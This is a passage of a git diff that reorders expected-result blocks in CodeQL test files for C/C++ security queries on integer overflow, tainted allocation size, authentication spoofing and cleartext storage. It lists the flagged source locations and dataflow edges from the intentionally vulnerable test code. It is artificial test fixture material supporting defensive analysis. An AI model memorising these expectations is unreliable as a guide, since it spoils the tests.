test.cpp:190:10:190:13 | call to rand | test.cpp:205:7:205:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | -| test.cpp:208:7:208:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:208:7:208:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | -| test.cpp:219:8:219:8 | x | test.cpp:215:11:215:14 | call to rand | test.cpp:219:8:219:8 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:215:11:215:14 | call to rand | uncontrolled value | edges | test.c:18:13:18:16 | call to rand | test.c:18:13:18:16 | call to rand | provenance | | | test.c:18:13:18:16 | call to rand | test.c:21:17:21:17 | r | provenance | | @@ -174,3 +146,31 @@ nodes | test.cpp:215:11:215:14 | call to rand | semmle.label | call to rand | | test.cpp:219:8:219:8 | x | semmle.label | x | subpaths +#select +| test.c:21:17:21:17 | r | test.c:18:13:18:16 | call to rand | test.c:21:17:21:17 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:18:13:18:16 | call to rand | uncontrolled value | +| test.c:35:5:35:5 | r | test.c:34:13:34:18 | call to rand | test.c:35:5:35:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:34:13:34:18 | call to rand | uncontrolled value | +| test.c:45:5:45:5 | r | test.c:44:13:44:16 | call to rand | test.c:45:5:45:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:44:13:44:16 | call to rand | uncontrolled value | +| test.c:77:9:77:9 | r | test.c:75:13:75:19 | call to rand | test.c:77:9:77:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:75:13:75:19 | call to rand | uncontrolled value | +| test.c:77:9:77:9 | r | test.c:75:13:75:19 | call to rand | test.c:77:9:77:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:75:13:75:19 | call to rand | uncontrolled value | +| test.c:83:9:83:9 | r | test.c:81:14:81:17 | call to rand | test.c:83:9:83:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:81:14:81:17 | call to rand | uncontrolled value | +| test.c:83:9:83:9 | r | test.c:81:23:81:26 | call to rand | test.c:83:9:83:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:81:23:81:26 | call to rand | uncontrolled value | +| test.c:127:9:127:9 | r | test.c:125:13:125:16 | call to rand | test.c:127:9:127:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:125:13:125:16 | call to rand | uncontrolled value | +| test.c:133:5:133:5 | r | test.c:131:13:131:16 | call to rand | test.c:133:5:133:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:131:13:131:16 | call to rand | uncontrolled value | +| test.c:139:10:139:10 | r | test.c:137:13:137:16 | call to rand | test.c:139:10:139:10 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:137:13:137:16 | call to rand | uncontrolled value | +| test.c:157:9:157:9 | r | test.c:155:22:155:27 | call to rand | test.c:157:9:157:9 | r | This arithmetic expression depends on an $@, potentially causing an underflow. | test.c:155:22:155:25 | call to rand | uncontrolled value | +| test.cpp:25:7:25:7 | r | test.cpp:8:9:8:12 | call to rand | test.cpp:25:7:25:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:8:9:8:12 | call to rand | uncontrolled value | +| test.cpp:31:7:31:7 | r | test.cpp:13:10:13:13 | call to rand | test.cpp:31:7:31:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:13:10:13:13 | call to rand | uncontrolled value | +| test.cpp:37:7:37:7 | r | test.cpp:18:9:18:12 | call to rand | test.cpp:37:7:37:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:18:9:18:12 | call to rand | uncontrolled value | +| test.cpp:65:9:65:9 | x | test.cpp:62:19:62:24 | call to rand | test.cpp:65:9:65:9 | x | This arithmetic expression depends on an $@, potentially causing an underflow. | test.cpp:62:19:62:22 | call to rand | uncontrolled value | +| test.cpp:90:10:90:10 | x | test.cpp:86:10:86:13 | call to rand | test.cpp:90:10:90:10 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:86:10:86:13 | call to rand | uncontrolled value | +| test.cpp:102:10:102:10 | x | test.cpp:98:10:98:13 | call to rand | test.cpp:102:10:102:10 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:98:10:98:13 | call to rand | uncontrolled value | +| test.cpp:146:9:146:9 | y | test.cpp:137:10:137:13 | call to rand | test.cpp:146:9:146:9 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:137:10:137:13 | call to rand | uncontrolled value | +| test.cpp:154:10:154:10 | b | test.cpp:151:10:151:13 | call to rand | test.cpp:154:10:154:10 | b | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:151:10:151:13 | call to rand | uncontrolled value | +| test.cpp:171:11:171:16 | y | test.cpp:169:11:169:14 | call to rand | test.cpp:171:11:171:16 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:169:11:169:14 | call to rand | uncontrolled value | +| test.cpp:196:7:196:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:196:7:196:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | +| test.cpp:198:7:198:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:198:7:198:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | +| test.cpp:199:7:199:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:199:7:199:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | +| test.cpp:204:7:204:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:204:7:204:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | +| test.cpp:205:7:205:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:205:7:205:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | +| test.cpp:208:7:208:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:208:7:208:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | +| test.cpp:219:8:219:8 | x | test.cpp:215:11:215:14 | call to rand | test.cpp:219:8:219:8 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:215:11:215:14 | call to rand | uncontrolled value | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.expected index e321000d0caa..4235033abccc 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.expected @@ -1,24 +1,3 @@ -#select -| test.cpp:43:31:43:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:43:38:43:44 | tainted | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:44:31:44:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:44:38:44:63 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:46:31:46:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:46:38:46:63 | ... + ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:49:25:49:30 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:49:32:49:35 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:50:17:50:30 | new[] | test.cpp:39:27:39:30 | **argv | test.cpp:50:17:50:30 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:53:21:53:27 | call to realloc | test.cpp:39:27:39:30 | **argv | test.cpp:53:35:53:60 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:128:17:128:22 | call to malloc | test.cpp:124:18:124:31 | *call to getenv | test.cpp:128:24:128:41 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:124:18:124:31 | *call to getenv | user input (an environment variable) | -| test.cpp:135:3:135:8 | call to malloc | test.cpp:133:19:133:32 | *call to getenv | test.cpp:135:10:135:27 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:133:19:133:32 | *call to getenv | user input (an environment variable) | -| test.cpp:152:4:152:9 | call to malloc | test.cpp:148:20:148:33 | *call to getenv | test.cpp:152:11:152:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:148:20:148:33 | *call to getenv | user input (an environment variable) | -| test.cpp:194:4:194:9 | call to malloc | test.cpp:190:19:190:32 | *call to getenv | test.cpp:194:11:194:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:190:19:190:32 | *call to getenv | user input (an environment variable) | -| test.cpp:209:4:209:9 | call to malloc | test.cpp:205:19:205:32 | *call to getenv | test.cpp:209:11:209:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:205:19:205:32 | *call to getenv | user input (an environment variable) | -| test.cpp:261:14:261:19 | call to malloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:261:21:261:21 | s | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | -| test.cpp:269:2:269:7 | call to malloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:269:9:269:18 | local_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | -| test.cpp:271:2:271:7 | call to malloc | test.cpp:241:14:241:27 | *call to getenv | test.cpp:271:9:271:24 | call to get_tainted_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:241:14:241:27 | *call to getenv | user input (an environment variable) | -| test.cpp:275:2:275:9 | call to my_alloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:275:11:275:20 | local_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | -| test.cpp:293:4:293:9 | call to malloc | test.cpp:289:20:289:33 | *call to getenv | test.cpp:293:11:293:29 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:289:20:289:33 | *call to getenv | user input (an environment variable) | -| test.cpp:321:4:321:9 | call to malloc | test.cpp:281:18:281:31 | *call to getenv | test.cpp:321:11:321:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:281:18:281:31 | *call to getenv | user input (an environment variable) | -| test.cpp:338:3:338:8 | call to malloc | test.cpp:281:18:281:31 | *call to getenv | test.cpp:338:10:338:27 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:281:18:281:31 | *call to getenv | user input (an environment variable) | -| test.cpp:385:25:385:33 | call to MyMalloc1 | test.cpp:383:18:383:31 | *call to getenv | test.cpp:385:35:385:38 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:383:18:383:31 | *call to getenv | user input (an environment variable) | -| test.cpp:386:25:386:33 | call to MyMalloc2 | test.cpp:383:18:383:31 | *call to getenv | test.cpp:386:35:386:38 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:383:18:383:31 | *call to getenv | user input (an environment variable) | edges | test.cpp:39:27:39:30 | **argv | test.cpp:40:16:40:19 | call to atoi | provenance | TaintFunction | | test.cpp:40:16:40:19 | call to atoi | test.cpp:43:38:43:44 | tainted | provenance | | @@ -109,3 +88,24 @@ nodes | test.cpp:385:35:385:38 | size | semmle.label | size | | test.cpp:386:35:386:38 | size | semmle.label | size | subpaths +#select +| test.cpp:43:31:43:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:43:38:43:44 | tainted | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:44:31:44:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:44:38:44:63 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:46:31:46:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:46:38:46:63 | ... + ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:49:25:49:30 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:49:32:49:35 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:50:17:50:30 | new[] | test.cpp:39:27:39:30 | **argv | test.cpp:50:17:50:30 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:53:21:53:27 | call to realloc | test.cpp:39:27:39:30 | **argv | test.cpp:53:35:53:60 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:128:17:128:22 | call to malloc | test.cpp:124:18:124:31 | *call to getenv | test.cpp:128:24:128:41 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:124:18:124:31 | *call to getenv | user input (an environment variable) | +| test.cpp:135:3:135:8 | call to malloc | test.cpp:133:19:133:32 | *call to getenv | test.cpp:135:10:135:27 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:133:19:133:32 | *call to getenv | user input (an environment variable) | +| test.cpp:152:4:152:9 | call to malloc | test.cpp:148:20:148:33 | *call to getenv | test.cpp:152:11:152:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:148:20:148:33 | *call to getenv | user input (an environment variable) | +| test.cpp:194:4:194:9 | call to malloc | test.cpp:190:19:190:32 | *call to getenv | test.cpp:194:11:194:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:190:19:190:32 | *call to getenv | user input (an environment variable) | +| test.cpp:209:4:209:9 | call to malloc | test.cpp:205:19:205:32 | *call to getenv | test.cpp:209:11:209:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:205:19:205:32 | *call to getenv | user input (an environment variable) | +| test.cpp:261:14:261:19 | call to malloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:261:21:261:21 | s | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | +| test.cpp:269:2:269:7 | call to malloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:269:9:269:18 | local_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | +| test.cpp:271:2:271:7 | call to malloc | test.cpp:241:14:241:27 | *call to getenv | test.cpp:271:9:271:24 | call to get_tainted_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:241:14:241:27 | *call to getenv | user input (an environment variable) | +| test.cpp:275:2:275:9 | call to my_alloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:275:11:275:20 | local_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | +| test.cpp:293:4:293:9 | call to malloc | test.cpp:289:20:289:33 | *call to getenv | test.cpp:293:11:293:29 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:289:20:289:33 | *call to getenv | user input (an environment variable) | +| test.cpp:321:4:321:9 | call to malloc | test.cpp:281:18:281:31 | *call to getenv | test.cpp:321:11:321:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:281:18:281:31 | *call to getenv | user input (an environment variable) | +| test.cpp:338:3:338:8 | call to malloc | test.cpp:281:18:281:31 | *call to getenv | test.cpp:338:10:338:27 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:281:18:281:31 | *call to getenv | user input (an environment variable) | +| test.cpp:385:25:385:33 | call to MyMalloc1 | test.cpp:383:18:383:31 | *call to getenv | test.cpp:385:35:385:38 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:383:18:383:31 | *call to getenv | user input (an environment variable) | +| test.cpp:386:25:386:33 | call to MyMalloc2 | test.cpp:383:18:383:31 | *call to getenv | test.cpp:386:35:386:38 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:383:18:383:31 | *call to getenv | user input (an environment variable) | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.expected index 795895891407..34aa8a7a7e4a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.expected @@ -1,15 +1,3 @@ -#select -| test2.cpp:14:11:14:11 | v | test2.cpp:25:22:25:23 | fscanf output argument | test2.cpp:14:11:14:11 | v | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:25:22:25:23 | fscanf output argument | value read by fscanf | -| test2.cpp:14:11:14:11 | v | test2.cpp:25:22:25:23 | fscanf output argument | test2.cpp:14:11:14:11 | v | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | test2.cpp:25:22:25:23 | fscanf output argument | value read by fscanf | -| test2.cpp:39:9:39:11 | num | test2.cpp:36:9:36:14 | fgets output argument | test2.cpp:39:9:39:11 | num | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:36:9:36:14 | fgets output argument | string read by fgets | -| test2.cpp:40:3:40:5 | num | test2.cpp:36:9:36:14 | fgets output argument | test2.cpp:40:3:40:5 | num | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:36:9:36:14 | fgets output argument | string read by fgets | -| test5.cpp:17:6:17:18 | call to getTaintedInt | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:17:6:17:18 | call to getTaintedInt | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | -| test5.cpp:19:6:19:6 | y | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:19:6:19:6 | y | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | -| test5.cpp:19:6:19:6 | y | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:19:6:19:6 | y | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | -| test.c:14:15:14:28 | maxConnections | main.cpp:7:27:7:30 | **argv | test.c:14:15:14:28 | maxConnections | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | -| test.c:14:15:14:28 | maxConnections | main.cpp:7:27:7:30 | **argv | test.c:14:15:14:28 | maxConnections | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | -| test.c:44:7:44:10 | len2 | main.cpp:7:27:7:30 | **argv | test.c:44:7:44:10 | len2 | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | -| test.c:54:7:54:10 | len3 | main.cpp:7:27:7:30 | **argv | test.c:54:7:54:10 | len3 | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | edges | main.cpp:7:27:7:30 | **argv | main.cpp:8:17:8:20 | **argv | provenance | | | main.cpp:8:17:8:20 | **argv | test.c:10:28:10:31 | **argv | provenance | | @@ -65,3 +53,15 @@ nodes | test.c:54:7:54:10 | len3 | semmle.label | len3 | | test.c:54:7:54:12 | ... -- | semmle.label | ... -- | subpaths +#select +| test2.cpp:14:11:14:11 | v | test2.cpp:25:22:25:23 | fscanf output argument | test2.cpp:14:11:14:11 | v | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:25:22:25:23 | fscanf output argument | value read by fscanf | +| test2.cpp:14:11:14:11 | v | test2.cpp:25:22:25:23 | fscanf output argument | test2.cpp:14:11:14:11 | v | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | test2.cpp:25:22:25:23 | fscanf output argument | value read by fscanf | +| test2.cpp:39:9:39:11 | num | test2.cpp:36:9:36:14 | fgets output argument | test2.cpp:39:9:39:11 | num | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:36:9:36:14 | fgets output argument | string read by fgets | +| test2.cpp:40:3:40:5 | num | test2.cpp:36:9:36:14 | fgets output argument | test2.cpp:40:3:40:5 | num | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:36:9:36:14 | fgets output argument | string read by fgets | +| test5.cpp:17:6:17:18 | call to getTaintedInt | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:17:6:17:18 | call to getTaintedInt | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | +| test5.cpp:19:6:19:6 | y | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:19:6:19:6 | y | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | +| test5.cpp:19:6:19:6 | y | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:19:6:19:6 | y | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | +| test.c:14:15:14:28 | maxConnections | main.cpp:7:27:7:30 | **argv | test.c:14:15:14:28 | maxConnections | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | +| test.c:14:15:14:28 | maxConnections | main.cpp:7:27:7:30 | **argv | test.c:14:15:14:28 | maxConnections | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | +| test.c:44:7:44:10 | len2 | main.cpp:7:27:7:30 | **argv | test.c:44:7:44:10 | len2 | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | +| test.c:54:7:54:10 | len3 | main.cpp:7:27:7:30 | **argv | test.c:54:7:54:10 | len3 | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected index 205d347a7740..117f94cfad8a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected @@ -1,10 +1,3 @@ -#select -| test.cpp:20:7:20:12 | call to strcmp | test.cpp:16:25:16:42 | *call to getenv | test.cpp:20:14:20:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:16:25:16:42 | *call to getenv | an environment variable | -| test.cpp:31:7:31:12 | call to strcmp | test.cpp:27:25:27:42 | *call to getenv | test.cpp:31:14:31:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:27:25:27:42 | *call to getenv | an environment variable | -| test.cpp:42:7:42:12 | call to strcmp | test.cpp:38:25:38:42 | *call to getenv | test.cpp:42:14:42:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:38:25:38:42 | *call to getenv | an environment variable | -| test.cpp:52:7:52:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:52:14:52:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | -| test.cpp:56:7:56:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:56:14:56:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | -| test.cpp:60:7:60:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:60:14:60:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | edges | test.cpp:16:25:16:42 | *call to getenv | test.cpp:16:25:16:42 | *call to getenv | provenance | | | test.cpp:16:25:16:42 | *call to getenv | test.cpp:20:14:20:20 | *address | provenance | | @@ -32,3 +25,10 @@ nodes | test.cpp:56:14:56:20 | *address | semmle.label | *address | | test.cpp:60:14:60:20 | *address | semmle.label | *address | subpaths +#select +| test.cpp:20:7:20:12 | call to strcmp | test.cpp:16:25:16:42 | *call to getenv | test.cpp:20:14:20:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:16:25:16:42 | *call to getenv | an environment variable | +| test.cpp:31:7:31:12 | call to strcmp | test.cpp:27:25:27:42 | *call to getenv | test.cpp:31:14:31:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:27:25:27:42 | *call to getenv | an environment variable | +| test.cpp:42:7:42:12 | call to strcmp | test.cpp:38:25:38:42 | *call to getenv | test.cpp:42:14:42:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:38:25:38:42 | *call to getenv | an environment variable | +| test.cpp:52:7:52:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:52:14:52:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | +| test.cpp:56:7:56:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:56:14:56:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | +| test.cpp:60:7:60:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:60:14:60:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.expected index 7598d27e2153..4133d62f00a3 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.expected @@ -1,6 +1,3 @@ -#select -| test2.cpp:110:3:110:6 | call to gets | test2.cpp:110:3:110:6 | *call to gets | test2.cpp:110:3:110:6 | *call to gets | This write into buffer 'password' may contain unencrypted data from $@. | test2.cpp:110:3:110:6 | *call to gets | user input (string read by gets) | -| test.cpp:58:3:58:9 | call to sprintf | test.cpp:53:27:53:30 | **argv | test.cpp:58:25:58:29 | *input | This write into buffer 'passwd' may contain unencrypted data from $@. | test.cpp:53:27:53:30 | **argv | user input (a command-line argument) | edges | test.cpp:53:27:53:30 | **argv | test.cpp:54:17:54:23 | *access to array | provenance | | | test.cpp:54:17:54:23 | *access to array | test.cpp:58:25:58:29 | *input | provenance | | @@ -10,3 +7,6 @@ nodes | test.cpp:54:17:54:23 | *access to array | semmle.label | *access to array | | test.cpp:58:25:58:29 | *input | semmle.label | *input | subpaths +#select +| test2.cpp:110:3:110:6 | call to gets | test2.cpp:110:3:110:6 | *call to gets | test2.cpp:110:3:110:6 | *call to gets | This write into buffer 'password' may contain unencrypted data from $@. | test2.cpp:110:3:110:6 | *call to gets | user input (string read by gets) | +| test.cpp:58:3:58:9 | call to sprintf | test.cpp:53:27:53:30 | **argv | test.cpp:58:25:58:29 | *input | This write into buffer 'passwd' may contain unencrypted data from $@. | test.cpp:53:27:53:30 | **argv | user input (a command-line argument) | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.expected index 067222327f28..e283cbeb57bc 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.expected @@ -1,19 +1,3 @@ -#select -| test2.cpp:43:2:43:8 | call to fprintf | test2.cpp:43:36:43:43 | password | test2.cpp:43:36:43:43 | password | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:43:36:43:43 | 